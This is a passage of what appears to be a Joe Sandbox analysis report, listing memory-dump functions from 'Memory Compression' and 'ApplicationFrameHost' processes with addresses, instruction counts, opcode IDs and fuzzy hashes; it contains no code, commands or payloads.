                                                                                                                                  • Opcode Fuzzy Hash: a46bfaf7d7e50b08f99c5be242b971290cc474358f462d7af63a3f2bf616dcd5
                                                                                                                                  • Instruction Fuzzy Hash: B5413622B1E5295EE344B77CA0956FA7790EF843A5F4405BBD00DCB1D3CF1CAC818298
                                                                                                                                  Function 00007FF848F10998 Relevance: .1, Instructions: 94COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000034.00000002.2743758243.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_52_2_7ff848f10000_Memory Compression.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 264f88648da85e54f94dfc1cc0a619710f737b50a2285f6c29a776e3c2ef77df
                                                                                                                                  • Instruction ID: 0ef6f576fc0e0cfca4a8468fe6a86075c8212de15f8311d0a99bed140813dbc7
                                                                                                                                  • Opcode Fuzzy Hash: 264f88648da85e54f94dfc1cc0a619710f737b50a2285f6c29a776e3c2ef77df
                                                                                                                                  • Instruction Fuzzy Hash: 1421C631B1C9191FE788F72C945977976C2EB99361F5401B9E40EC33E7DE68EC428285
                                                                                                                                  Function 00007FF848F10C25 Relevance: .1, Instructions: 84COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000034.00000002.2743758243.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_52_2_7ff848f10000_Memory Compression.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: f5f5f4911d6bf1fef5be61a6e80c1aa87a8c312fb4eb4ffbe3f716d85c6a3aaa
                                                                                                                                  • Instruction ID: 537fd30455cb911963abc8579537191658bf49eca55d56bf5e7b9301eca16810
                                                                                                                                  • Opcode Fuzzy Hash: f5f5f4911d6bf1fef5be61a6e80c1aa87a8c312fb4eb4ffbe3f716d85c6a3aaa
                                                                                                                                  • Instruction Fuzzy Hash: E521F836E0D26A9EE312B76898511EC7B70EFC13A5F1445B3D448CB1C3DB3C694A8B99
                                                                                                                                  Function 00007FF848F152C2 Relevance: .1, Instructions: 75COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000034.00000002.2743758243.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_52_2_7ff848f10000_Memory Compression.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: e7fe9a955ed3b342f3e22afd4fc7485aef3792970903eaff2798a489a075c5e3
                                                                                                                                  • Instruction ID: 9052f67a9270142fee740d986d1ee4cc0218fe22ae49b9c8b02649a922e7afe6
                                                                                                                                  • Opcode Fuzzy Hash: e7fe9a955ed3b342f3e22afd4fc7485aef3792970903eaff2798a489a075c5e3
                                                                                                                                  • Instruction Fuzzy Hash: 11211030D1C92E4EE7A4F71888557F872A1FF98351F5001BAD84EE32D6DF686D818B49
                                                                                                                                  Function 00007FF848F1538E Relevance: .1, Instructions: 62COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000034.00000002.2743758243.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_52_2_7ff848f10000_Memory Compression.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 95f23426be26183a9930cdda506bc005cf55d1ded4a29d8883cea958cc96d6b5
                                                                                                                                  • Instruction ID: bec151b813f5d07b2509a22e07559adf2324a6e90149fc1de037c5c538496665
                                                                                                                                  • Opcode Fuzzy Hash: 95f23426be26183a9930cdda506bc005cf55d1ded4a29d8883cea958cc96d6b5
                                                                                                                                  • Instruction Fuzzy Hash: A9114230E1C91A8FEB98FB28C4557B87392FF99340F5000B5D84ED32D6EE68BC418A49
                                                                                                                                  Function 00007FF848F10C38 Relevance: .1, Instructions: 54COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000034.00000002.2743758243.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_52_2_7ff848f10000_Memory Compression.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 2996046c805899043aac0ac2736b28bae1d5389af0c9782dcab21eae9cb0e925
                                                                                                                                  • Instruction ID: 19496bf566baf2b8446f005b37f2469b5d718eaa3b99edf9c6ef402089094445
                                                                                                                                  • Opcode Fuzzy Hash: 2996046c805899043aac0ac2736b28bae1d5389af0c9782dcab21eae9cb0e925
                                                                                                                                  • Instruction Fuzzy Hash: BD11C235E0D6998FE702FB2898511AC7BB0EFC2390F1444B7D444DB2D2DA385D498B94
                                                                                                                                  Function 00007FF848F10C40 Relevance: .0, Instructions: 48COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000034.00000002.2743758243.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_52_2_7ff848f10000_Memory Compression.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 212110996dae5ced34412b44eab53468966e709877963ed8f9dbdc79d2ebfb85
                                                                                                                                  • Instruction ID: 18ea889dec4dbde4fae52060380dc1d5dc98366e661c53847566c45326c32549
                                                                                                                                  • Opcode Fuzzy Hash: 212110996dae5ced34412b44eab53468966e709877963ed8f9dbdc79d2ebfb85
                                                                                                                                  • Instruction Fuzzy Hash: E211C035E0D6998FE702FB2888501AC7FB0EF82390F1445F7D844DB2D2DA386D498B84
                                                                                                                                  Function 00007FF848F11AFC Relevance: .0, Instructions: 44COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000034.00000002.2743758243.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_52_2_7ff848f10000_Memory Compression.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 91c7430d24d0be6ced670ec0de8b3a5a537a2d407152665fe4709e5bbe0fe478
                                                                                                                                  • Instruction ID: 8b1e144136b7d90872d7a9d06a4c46d315f06e3b996fd358e94f0f9c05033a0e
                                                                                                                                  • Opcode Fuzzy Hash: 91c7430d24d0be6ced670ec0de8b3a5a537a2d407152665fe4709e5bbe0fe478
                                                                                                                                  • Instruction Fuzzy Hash: 2B014431A0C9198FDB54EB08C890FA973E1EB68340F4442A9C40ED32E1CF34AD84CF85
                                                                                                                                  Function 00007FF848F14207 Relevance: .0, Instructions: 37COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000034.00000002.2743758243.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_52_2_7ff848f10000_Memory Compression.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 6f7a70f42fe8972f60e956b6657d38f44f343d715b2602d712ecbdd2a4c2f828
                                                                                                                                  • Instruction ID: 8ef9974f923b753490602ee348910a1bfe62b0ba59be4a9e8e8653aadabefca5
                                                                                                                                  • Opcode Fuzzy Hash: 6f7a70f42fe8972f60e956b6657d38f44f343d715b2602d712ecbdd2a4c2f828
                                                                                                                                  • Instruction Fuzzy Hash: 0FF03A31E5C92A9EF698F72C84546B92283EBD8390F054575D80DD72D6DE28AC828788
                                                                                                                                  Function 00007FF848F10C50 Relevance: .0, Instructions: 37COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000034.00000002.2743758243.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_52_2_7ff848f10000_Memory Compression.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 5b0b9183de3bd48f5cf998e7f0f7be2de8b686022b40fc3e22b7b8ad88206502
                                                                                                                                  • Instruction ID: 313904d17d0c4cc9288c7a10871e07c44d4fd682a0657d47a7140f9460772790
                                                                                                                                  • Opcode Fuzzy Hash: 5b0b9183de3bd48f5cf998e7f0f7be2de8b686022b40fc3e22b7b8ad88206502
                                                                                                                                  • Instruction Fuzzy Hash: E5017C30D0D2999FE712FB6488541ADBFB0AF82344F1441F6D844DB2D2DA385A448B85
                                                                                                                                  Function 00007FF848F1541D Relevance: .0, Instructions: 34COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000034.00000002.2743758243.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_52_2_7ff848f10000_Memory Compression.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 00824e5838731c44b5c43462efd30fdea2b9becd264f405d9f3597f0843a589c
                                                                                                                                  • Instruction ID: 2dd7f7a4d5271ef2d76df14353dbe78560a3181cfb436ef0e98cf8166bf58672
                                                                                                                                  • Opcode Fuzzy Hash: 00824e5838731c44b5c43462efd30fdea2b9becd264f405d9f3597f0843a589c
                                                                                                                                  • Instruction Fuzzy Hash: 8AF0B43091C41A4FE698F708D8417F83392EF88391F1001BADC4ED31D6DE287D458A49
                                                                                                                                  Function 00007FF848F12491 Relevance: .0, Instructions: 30COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000034.00000002.2743758243.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_52_2_7ff848f10000_Memory Compression.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: f2ef019780ddc51ad020f837db42f8552a723972c3dd98c53e2ae7eea03d5a03
                                                                                                                                  • Instruction ID: 7dbb1c05b21831083b5dd362aa7193466a3b7c11857f547b3d6f21c68dadcfc2
                                                                                                                                  • Opcode Fuzzy Hash: f2ef019780ddc51ad020f837db42f8552a723972c3dd98c53e2ae7eea03d5a03
                                                                                                                                  • Instruction Fuzzy Hash: 3CE03031E0D82B9EF6A0B71C8444AB92282EB98790F140276D80DD32D6DE186C828789
                                                                                                                                  Function 00007FF848F10CCD Relevance: .0, Instructions: 28COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000034.00000002.2743758243.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_52_2_7ff848f10000_Memory Compression.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 2439364cd9a21e1ef983839ac1784176e4116d7c855d68e8ee16aa19483bb34c
                                                                                                                                  • Instruction ID: 6fcd76b900f47826d60fa75d59b2d174cc8c37bb80d550d64a2bc6e6c2381ead
                                                                                                                                  • Opcode Fuzzy Hash: 2439364cd9a21e1ef983839ac1784176e4116d7c855d68e8ee16aa19483bb34c
                                                                                                                                  • Instruction Fuzzy Hash: FDF09A31E0C61A9EE744FB2888942B977E0FB95391F1445B9D409D22C1DB386980CA44
                                                                                                                                  Function 00007FF848F11E76 Relevance: .0, Instructions: 25COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000034.00000002.2743758243.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_52_2_7ff848f10000_Memory Compression.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 9761d96c04c4d35eb96ed23dfbaf989e82b265e1b74c2f67cf04f414d12687e5
                                                                                                                                  • Instruction ID: 311b0ee779db2edf2f6631b5fd87422d8e45cf51757e7e1f0c395ea08fdd1eb9
                                                                                                                                  • Opcode Fuzzy Hash: 9761d96c04c4d35eb96ed23dfbaf989e82b265e1b74c2f67cf04f414d12687e5
                                                                                                                                  • Instruction Fuzzy Hash: D2E04F31E4D82A5EE6D4F71C8454AB522D2EB98750F140176D80DC32D6DE286C828785
                                                                                                                                  Function 00007FF848F16F01 Relevance: .0, Instructions: 22COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000034.00000002.2743758243.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_52_2_7ff848f10000_Memory Compression.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: fc7094eeb4794d424b703d3708d3935327f2967980bb3fc0de8692a787a54a96
                                                                                                                                  • Instruction ID: 03c21a4d4784ac629fcd01221c2394cc79718dc2bab59c75439b25b0c056a93b
                                                                                                                                  • Opcode Fuzzy Hash: fc7094eeb4794d424b703d3708d3935327f2967980bb3fc0de8692a787a54a96
                                                                                                                                  • Instruction Fuzzy Hash: 64E01A30E0C1268EF755B358C8613A97265EB88380F541078D94E973C2DF28AE45860D
                                                                                                                                  Function 00007FF848F1085D Relevance: .0, Instructions: 14COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000034.00000002.2743758243.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_52_2_7ff848f10000_Memory Compression.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 28d46ec8f6734d0c972d30e0222444d7b239de2724329f2d889af5c15fc7c3cb
                                                                                                                                  • Instruction ID: 0ba04314d444de1b38a17f0f7700764e6c7a19447d88d1fccd9b7790b84b9593
                                                                                                                                  • Opcode Fuzzy Hash: 28d46ec8f6734d0c972d30e0222444d7b239de2724329f2d889af5c15fc7c3cb
                                                                                                                                  • Instruction Fuzzy Hash: 87C08C346148088FCA08FB2DC88580833A0FB0A310BC200E0E00CC71B1E219DCC2CB41
                                                                                                                                  Function 00007FF848F10B9D Relevance: .0, Instructions: 14COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000034.00000002.2743758243.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_52_2_7ff848f10000_Memory Compression.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: ba44e30b299232d18dd58396ab05012bbb058ffb7b5d4e444c28c93c79ff008a
                                                                                                                                  • Instruction ID: 8e3f090ec98a18358b19f230978796e7dde748cba2070448f6823685d23cde85
                                                                                                                                  • Opcode Fuzzy Hash: ba44e30b299232d18dd58396ab05012bbb058ffb7b5d4e444c28c93c79ff008a
                                                                                                                                  • Instruction Fuzzy Hash: B6C0123062980E8FDA40BB28C889824BBA0FB0E302BD900E0E00CC71A1D629A8908704
                                                                                                                                  Function 00007FF848F106A5 Relevance: .0, Instructions: 13COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000034.00000002.2743758243.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_52_2_7ff848f10000_Memory Compression.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 643015e1c7310c5d1a56e7e1db4f7d8a6ab91577b56fde5bd677069fa0ac72df
                                                                                                                                  • Instruction ID: 0f4ab1da189774152a9bbc32191f72b7a891135fe6eeddd7824fb44c75d1819a
                                                                                                                                  • Opcode Fuzzy Hash: 643015e1c7310c5d1a56e7e1db4f7d8a6ab91577b56fde5bd677069fa0ac72df
                                                                                                                                  • Instruction Fuzzy Hash: 0DC08C20D1E42B08F400B32E14420ACA1005BC8390FD40033D80C401C1AE0D28D5014E
                                                                                                                                  Function 00007FF848F16D1F Relevance: .0, Instructions: 11COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000034.00000002.2743758243.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_52_2_7ff848f10000_Memory Compression.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 6577f2507bd287501a8922fc32c5388938d9e4defea9a19a288f683ad9d3d0b9
                                                                                                                                  • Instruction ID: d813af87f8acd91f0b988fb2a93726b977700c64b49bc1709d68f72682b58182
                                                                                                                                  • Opcode Fuzzy Hash: 6577f2507bd287501a8922fc32c5388938d9e4defea9a19a288f683ad9d3d0b9
                                                                                                                                  • Instruction Fuzzy Hash: AAC00235E1C92A4FEAD9B37884652BD51C56F95380F441574E80ED36D3DE2D6C418E48
                                                                                                                                  Function 00007FF848F12BEB Relevance: .0, Instructions: 10COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000034.00000002.2743758243.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_52_2_7ff848f10000_Memory Compression.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 6b30fefd4a175ea69525d0c8f488cc9f61030d925c57df0f4f848f6f2a3aeee1
                                                                                                                                  • Instruction ID: 23bab9be0da02790b6896b586a3fe1b490f224be80807972a6a4b3151ca00ec1
                                                                                                                                  • Opcode Fuzzy Hash: 6b30fefd4a175ea69525d0c8f488cc9f61030d925c57df0f4f848f6f2a3aeee1
                                                                                                                                  • Instruction Fuzzy Hash: 2EC04C11F1ED265AE2567314482137E0856DF44794FD44474E50E977CACE8D5E4106DA
                                                                                                                                  Function 00007FF848F106C8 Relevance: .0, Instructions: 8COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000034.00000002.2743758243.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_52_2_7ff848f10000_Memory Compression.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 51005e9a319c078acd7e7f91fb5d88e3f86524efe7ca5d68b5647fc29041d042
                                                                                                                                  • Instruction ID: 60b4547f6db5107f5391bb8b86cbaa8acb0b6afc5e77639c03a15d1af411ee3a
                                                                                                                                  • Opcode Fuzzy Hash: 51005e9a319c078acd7e7f91fb5d88e3f86524efe7ca5d68b5647fc29041d042
                                                                                                                                  • Instruction Fuzzy Hash: 63B01210C6E40F04E444337B089206470405B8C344FC40070D80C402C19A4D18A4024A

                                                                                                                                  Executed Functions

                                                                                                                                  Function 00007FF848F20986 Relevance: 2.0, Instructions: 1989COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000037.00000002.2862284207.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_55_2_7ff848f20000_ApplicationFrameHost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: abe0b952cf564ff2e3af320367c601346b5015d672831dbb706b0f47479fc2ee
                                                                                                                                  • Instruction ID: 55d4597ede0cd7d817fde5e832aeb599617d29f3c461eedf40d0567fa94dcd00
                                                                                                                                  • Opcode Fuzzy Hash: abe0b952cf564ff2e3af320367c601346b5015d672831dbb706b0f47479fc2ee
                                                                                                                                  • Instruction Fuzzy Hash: F2E26F31E1C95A4FEA98FB2894556B5B3A2FF98380F1405B9D40DC32C6DF39BC868749
                                                                                                                                  Function 00007FF848F10D48 Relevance: 1.5, Strings: 1, Instructions: 257COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000037.00000002.2862284207.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_55_2_7ff848f10000_ApplicationFrameHost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 5[_H
                                                                                                                                  • API String ID: 0-3279724263
                                                                                                                                  • Opcode ID: fa2d5c493cf3d09b5496b6dad8a09b8c4eccc3b2c6bbe6fa533a1470a7972799
                                                                                                                                  • Instruction ID: 031c6fcf339c90d6f0205c6a7f75e5406c881c6e04ead98e104581905f03a52b
                                                                                                                                  • Opcode Fuzzy Hash: fa2d5c493cf3d09b5496b6dad8a09b8c4eccc3b2c6bbe6fa533a1470a7972799
                                                                                                                                  • Instruction Fuzzy Hash: 3591D375D1DA9A9FE749EB2888293BABFE1FB95350F4000BAC00DD72D2DF7818148715
                                                                                                                                  Function 00007FF848F41141 Relevance: .5, Instructions: 478COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000037.00000002.2862284207.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_55_2_7ff848f40000_ApplicationFrameHost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 8605eadb34b9d7532c9b6ea4a880ba0c1c68dfc3304a7f31a481da7adcca8a65
                                                                                                                                  • Instruction ID: bacba8921c20810b6fbc5ebfc18528c8ed5a55b82ceb52eec98c8b00383c9e5d
                                                                                                                                  • Opcode Fuzzy Hash: 8605eadb34b9d7532c9b6ea4a880ba0c1c68dfc3304a7f31a481da7adcca8a65
                                                                                                                                  • Instruction Fuzzy Hash: 69D18D3197C79A0FE31D6B285C820B577D1EBA2785F1886BED4DBC31C7EA1CA4478285
                                                                                                                                  Function 00007FF848F41175 Relevance: .3, Instructions: 326COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000037.00000002.2862284207.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_55_2_7ff848f40000_ApplicationFrameHost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 843ff16490776d584f23790fcb3fc236dca433b8a41562ea20d0d0a76f1a78b1
                                                                                                                                  • Instruction ID: 4ed6b5154cccf4e9b4582cdd4db81a901907ce49ec5ce68096e8674933760520
                                                                                                                                  • Opcode Fuzzy Hash: 843ff16490776d584f23790fcb3fc236dca433b8a41562ea20d0d0a76f1a78b1
                                                                                                                                  • Instruction Fuzzy Hash: A381AD32E7C7560BE31C6A289C820B577C5EBE2646F18827ED8DBD31C7EE18E8474185
                                                                                                                                  Function 00007FF848F10E43 Relevance: .2, Instructions: 171COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000037.00000002.2862284207.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_55_2_7ff848f10000_ApplicationFrameHost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 625e780a11d2a42f61a8fffb1283c48c8edc9f42324749f6e6361ac22a238645
                                                                                                                                  • Instruction ID: a61cae0b62032e2819be2f3937d87bd9efc9a52873b87d60764a8fc2fba05ee8
                                                                                                                                  • Opcode Fuzzy Hash: 625e780a11d2a42f61a8fffb1283c48c8edc9f42324749f6e6361ac22a238645
                                                                                                                                  • Instruction Fuzzy Hash: 3751E075A29A5A8EE388EB1884697BABFE1FB99390F40017EC00DD77D5DB7918148704
                                                                                                                                  Function 00007FF848F41A0D Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000037.00000002.2862284207.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_55_2_7ff848f40000_ApplicationFrameHost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: M
                                                                                                                                  • API String ID: 0-3664761504
                                                                                                                                  • Opcode ID: b11ab15834ae17f438eda920f2daa5b35bb210aef79173d1e6f51abcac96ec11
                                                                                                                                  • Instruction ID: 64c958f13b303cdf68004ba4ded135f7d0980c63940172d46f57b28e555db5d3
                                                                                                                                  • Opcode Fuzzy Hash: b11ab15834ae17f438eda920f2daa5b35bb210aef79173d1e6f51abcac96ec11
                                                                                                                                  • Instruction Fuzzy Hash: F6411430E0C6954FE719AB3888093697BD1EF6A755F0402BED04DD72C3EF6C5886878A
                                                                                                                                  Function 00007FF848F23B26 Relevance: 1.3, Strings: 1, Instructions: 31COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000037.00000002.2862284207.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_55_2_7ff848f20000_ApplicationFrameHost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: I
                                                                                                                                  • API String ID: 0-3707901625
                                                                                                                                  • Opcode ID: 81dabbfdccdeb0d0615d71020a95fe5350d643cf8b8a95a3a144aa072fe54919
                                                                                                                                  • Instruction ID: 23177bc8123d51fed46ff541a8c474043148577d3afab3940e4cfa65dc9bc2f2
